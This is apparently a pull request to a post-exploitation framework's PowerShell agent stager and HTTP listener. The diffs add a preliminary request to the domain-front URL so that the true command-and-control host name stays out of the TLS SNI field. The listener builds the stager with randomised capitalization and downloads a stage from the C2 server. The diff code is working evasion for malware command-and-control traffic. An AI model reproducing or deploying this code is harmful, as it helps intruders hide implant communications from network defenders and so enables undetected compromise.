### PR TITLE
Hide true host name when using domain fronting

### DIFF
--- a/data/agent/stagers/http.ps1
+++ b/data/agent/stagers/http.ps1
@@ -113,6 +113,10 @@ function Start-Negotiate {
         $headers | ForEach-Object {
             $headerKey = $_.split(':')[0];
             $headerValue = $_.split(':')[1];
+	    #If host header defined, assume domain fronting is in use and add a call to the base URL first
+	    #this is a trick to keep the true host name from showing in the TLS SNI portion of the client hello
+	    if ($headerKey -eq "host"){
+                try{$ig=$WC.DownloadData($s)}catch{}};
             $wc.Headers.Add($headerKey, $headerValue);
         }
     }
@@ -198,6 +202,10 @@ function Start-Negotiate {
         $headers | ForEach-Object {
             $headerKey = $_.split(':')[0];
             $headerValue = $_.split(':')[1];
+	    #If host header defined, assume domain fronting is in use and add a call to the base URL first
+	    #this is a trick to keep the true host name from showing in the TLS SNI portion of the client hello
+	    if ($headerKey -eq "host"){
+                try{$ig=$WC.DownloadData($s)}catch{}};
             $wc.Headers.Add($headerKey, $headerValue);
         }
     }

--- a/lib/listeners/http.py
+++ b/lib/listeners/http.py
@@ -252,6 +252,7 @@ class Listener:
                 routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='POWERSHELL', meta='STAGE0', additional='None', encData='')
                 b64RoutingPacket = base64.b64encode(routingPacket)
 
+                stager += "$ser='%s';$t='%s';" % (host, stage0)
                 #Add custom headers if any
                 if customHeaders != []:
                     for header in customHeaders:
@@ -260,8 +261,7 @@ class Listener:
 			#If host header defined, assume domain fronting is in use and add a call to the base URL first
 			#this is a trick to keep the true host name from showing in the TLS SNI portion of the client hello
 			if headerKey.lower() == "host":
-			    stager += "$clr='%s';" % (host)
-			    stager += helpers.randomize_capitalization("$WC.DownloadData($clr);")
+			    stager += helpers.randomize_capitalization("try{$ig=$WC.DownloadData($ser)}catch{};")
                         stager += helpers.randomize_capitalization("$wc.Headers.Add(")
                         stager += "\"%s\",\"%s\");" % (headerKey, headerValue)
 
@@ -270,7 +270,7 @@ class Listener:
                 stager += helpers.randomize_capitalization("$wc.Headers.Add(")
                 stager += "\"Cookie\",\"session=%s\");" % (b64RoutingPacket)
 
-                stager += "$ser='%s';$t='%s';" % (host, stage0)
+
                 stager += helpers.randomize_capitalization("$data=$WC.DownloadData($ser+$t);")
                 stager += helpers.randomize_capitalization("$iv=$data[0..3];$data=$data[4..$data.length];")
 

--- a/lib/listeners/http.py
+++ b/lib/listeners/http.py
@@ -257,6 +257,11 @@ class Listener:
                     for header in customHeaders:
                         headerKey = header.split(':')[0]
                         headerValue = header.split(':')[1]
+			#If host header defined, assume domain fronting is in use and add a call to the base URL first
+			#this is a trick to keep the true host name from showing in the TLS SNI portion of the client hello
+			if headerKey.lower() == "host":
+			    stager += "$clr='%s';" % (host)
+			    stager += helpers.randomize_capitalization("$WC.DownloadData($clr);")
                         stager += helpers.randomize_capitalization("$wc.Headers.Add(")
                         stager += "\"%s\",\"%s\");" % (headerKey, headerValue)
 


### PR DESCRIPTION
Kudos to @malcomvetter for suggesting the solution implemented here.

Currently, when adding a host header via the .Net framework, as is done in the PowerShell multi/launcher,  the host name gets added to two places:

1) The HTTP header
2) The Server Name Indication (SNI) extension of the TLS client hello

The SNI is always sent in cleartext, giving away the true hostname that you are using behind your domain front. This code change simply adds a request to the root of the domain front before adding the host header, allowing the TLS connection to complete. Subsequent requests reuse this pre-established TLS connection. Therefore, adding the host name header at his point results in the value only being added to the HTTP header and not showing up in the client hello.